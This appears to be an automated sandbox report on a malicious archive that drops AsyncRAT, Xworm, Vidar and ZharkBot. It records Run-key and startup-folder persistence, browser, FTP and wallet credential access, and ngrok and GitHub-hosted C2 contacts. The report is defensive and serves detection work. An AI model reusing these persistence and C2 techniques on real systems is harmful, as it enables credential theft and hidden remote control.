Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
Zharkbot family
Detect Vidar Stealer
Asyncrat family
Detect Xworm Payload
Detects ZharkBot payload
Vidar
Vidar family
Xworm family
Xworm
AsyncRat
ZharkBot
Async RAT payload
Boot or Logon Autostart Execution: Active Setup
Downloads MZ/PE file
Uses browser remote debugging
Modifies Windows Firewall
Sets service image path in registry
Reads data files stored by FTP clients
Drops startup file
Unsecured Credentials: Credentials In Files
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Event Triggered Execution: Component Object Model Hijacking
Enumerates connected drives
Installs/modifies Browser Helper Object
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Boot or Logon Autostart Execution: Authentication Package
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
Program crash
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Detects Pyinstaller
System Network Configuration Discovery: Internet Connection Discovery
Uses Volume Shadow Copy service COM API
System policy modification
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Modifies registry class
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-02-14 01:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-14 01:10
Reported
2025-02-14 01:54
Platform
win11-20250210-en
Max time kernel
1800s
Max time network
1800s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
ZharkBot
Zharkbot family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe" | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1003530991-2962315046-3000157291-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\documents\\OneDrive.exe" | C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe" | C:\Users\Admin\AppData\Local\Temp\Files\Update.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe" | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1003530991-2962315046-3000157291-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Update.exe\" .." | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Update.exe\" .." | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe" | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1003530991-2962315046-3000157291-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe" | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
Checks installed software on the system
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\stub.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\stub.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Update.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
